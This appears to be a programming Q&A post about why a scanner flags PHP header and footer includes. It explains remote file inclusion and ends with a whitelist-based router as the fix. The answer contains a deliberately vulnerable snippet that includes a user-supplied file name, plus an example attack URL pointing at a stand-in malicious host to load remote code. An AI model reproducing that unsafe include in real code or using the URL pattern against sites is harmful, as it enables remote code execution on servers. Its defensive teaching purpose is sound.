Tags: php, security, include, whitelist

How can a simple PHP include file be vulnerable?


I have a header.php and a footer.php which I include into all other pages like home, contact, about us etc.

The way I include the header and the footer file is

<?php
include 'inc/header.php';
// page content goes here
include 'inc/footer.php'; // the second include is the footer, not header.php again
?>

Everything simple and works fine.

I decided to check my project for vulnerabilities and downloaded the RIPS scanner. After the scan, the result was:

Userinput reaches sensitive sink.

5: include include 'inc/header.php';  // header.php
requires:
     5: if(!in_array($_GET['file'], $files)) else

which basically says that both the header and the footer include are vulnerable and that I should use

if(!in_array($_GET['file'], $files)) else

How can a simple header and footer include be vulnerable? And if it is vulnerable, how should I implement if(!in_array($_GET['file'], $files)) else ??

header.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="icon" href="images/common/lbfavicon.ico" />
    <meta name="author" content="example.com" />
    <link rel="stylesheet" type="text/css" href="template/css/reset.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="template/css/layout.css" media="screen"/>
</head>

<body>
    <div id="header-wrapper">
        <div class="container">
            <div id="nav">
                <ul>
                    <li><a href="./">Home</a></li>
                    <li><a href="index.php?page=about">About</a></li>
                    <li><a href="index.php?page=contact">Contact</a></li>
                </ul>
            </div><!-- nav ends -->
        </div><!-- container ends -->
    </div><!-- header wrapper ends -->

    <div id="header">
        <div class="container">
            <div id="logo">
                <a href="./"><img src="template/images/logo.png" width="125" height="45" alt="logo" /></a>
            </div><!-- logo ends -->
            <div id="search">
                <form method="get" action="searchresult.php">
                    <div class="form-item">
                       Search: <input  type="text" maxlength="120" name="searchfor" />
                    </div>
                </form>
            </div><!-- search ends -->
        </div><!-- container ends-->
    </div><!-- header ends -->

    <div class="container">
        <div id="announcement">
            <div id="breadcrumbs"></div>
        </div><!-- announcement ends -->
        <div id="pagewrapper">

Footer.php

        <div id="bottom">
            <div class="column">
                <h2>Abc.com</h2>
                    <ul>
                        <li><a href="about">About</a></li>
                        <li><a href="contact">Contact</a></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Mode of payment</h2>
                    <ul>
                        <li>Credit/Debit card | Cheque | Demand draft</li>
                    </ul>
                <h2>Get in touch</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Call us / Mail us</h2>
                    <ul>
                        <li>0-9999384745 / <a href="mailto:info@example.com">info@example.com</a></li>
                    </ul>
                <h2>Share us</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div style="clear: both;"></div>
        </div> <!-- bottom ends -->

        <div id="footer">

        </div>

        </div> <!--Pagewrapper end-->
    </div>    
</body>
</html>

Solution

  • Well, I suppose this is just a warning, but generally speaking, when you include .php scripts whose names come from user input, you should absolutely check whether the names provided are valid (to prevent security issues).

    For example, a lot of websites use a "global" file that includes other files according to the requests coming from the user.

    Example :

    <?php

    $get = $_GET['action'];   // user-controlled value
    if ($get == "index") {
        include "includes/index.php";
    }
    //...
    else {
        include $get . ".php";   // the raw request value becomes the file name
    }


    Now let's imagine someone wants to include a malicious script within your website. If your server allows cross-website requests, then people could specify an external script that could be dangerous for your server or the other users.

    Example: ./global.php?action=http://malicious4ever.com/dirtything
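    A whitelist-based page router, as an added example that is not code from the question or the answer: it shows how the in_array() check the scanner suggested fits into a page like the poster's index.php. It assumes the page bodies live in includes/<name>.php and uses the `page` query parameter that the header's own links already send (index.php?page=about).

```php
<?php
// Added example, not from the question or the answer.
// Assumption: page bodies are stored as includes/<name>.php.
declare(strict_types=1);

// The only page names this script is ever allowed to include.
// Nothing from the request is used as a path unless it is exactly one of these.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Return a page name that is guaranteed to be in the whitelist.
 * $query is normally $_GET; it is passed in so the function can be tested.
 */
function resolvePage(array $query, array $allowed = ALLOWED_PAGES): string
{
    $page = $query['page'] ?? 'home';

    // is_string() rejects ?page[]=... (PHP turns that into an array).
    // The third argument makes in_array() use strict (===) comparison, so
    // loose-comparison surprises such as "0" == "home" cannot occur.
    if (!is_string($page) || !in_array($page, $allowed, true)) {
        // Unknown page: fall back to a known-safe default. Do not echo $page
        // back into the response, and do not build a path from it.
        return 'home';
    }
    return $page;
}

$page = resolvePage($_GET);

include 'inc/header.php';
// $page can only hold one of the whitelisted literals at this point,
// so the include path is never influenced by the raw request value.
include __DIR__ . '/includes/' . $page . '.php';
include 'inc/footer.php';
```

    The literal includes of inc/header.php and inc/footer.php take no user input at all, which is why a fixed file name is not a sink; the check only matters on the line where a request value chooses the file.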